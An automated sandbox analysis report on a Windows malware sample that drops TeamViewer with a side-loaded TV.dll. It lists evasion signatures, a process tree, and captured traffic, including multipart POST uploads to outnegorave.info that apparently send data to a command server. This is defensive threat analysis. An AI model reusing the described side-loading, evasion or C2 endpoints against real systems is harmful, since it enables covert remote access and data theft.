Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 77Etc0bR2v.exe

Overview

General Information

Sample Name:77Etc0bR2v.exe
Analysis ID:483795
MD5:e71e3b995477081569ed357e4d403666
SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags:exeHartexLLCsignedsoldewornek
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 77Etc0bR2v.exe (PID: 6880 cmdline: 'C:\Users\user\Desktop\77Etc0bR2v.exe' MD5: E71E3B995477081569ED357E4D403666)
    • TeamViewer.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5424 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5568 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 1972 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5724 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6052 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 6704 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%Perma Link
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllReversingLabs: Detection: 26%
Source: 1.2.77Etc0bR2v.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,3_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,3_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_006F605B CryptReleaseContext,3_2_006F605B
Source: C:\Users\user\Desktop\77Etc0bR2v.exeEXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SAMCLI.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMM.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SHFolder.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: VERSION.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WININET.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: MSVFW32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: CRYPTSP.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: AVICAP32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WSOCK32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: SHFOLDER.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMMBASE.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: NETUTILS.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SRVCLI.DLLJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: CLDAPI.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SensApi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\77Etc0bR2v.exeEXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SAMCLI.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMM.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SHFolder.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: VERSION.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WININET.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: Cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: MSVFW32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: CRYPTSP.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: AVICAP32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WSOCK32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: SHFOLDER.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: WINMMBASE.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: NETUTILS.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SRVCLI.DLLJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: CLDAPI.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: SensApi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeDLL: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeDLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to behavior
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,6_2_6F3328B0
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 90555Content-Type: multipart/form-data; boundary=--------2341619378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86397Content-Type: multipart/form-data; boundary=--------1750076427User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: unknownTCP traffic detected without corresponding DNS query: 37.252.232.109
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 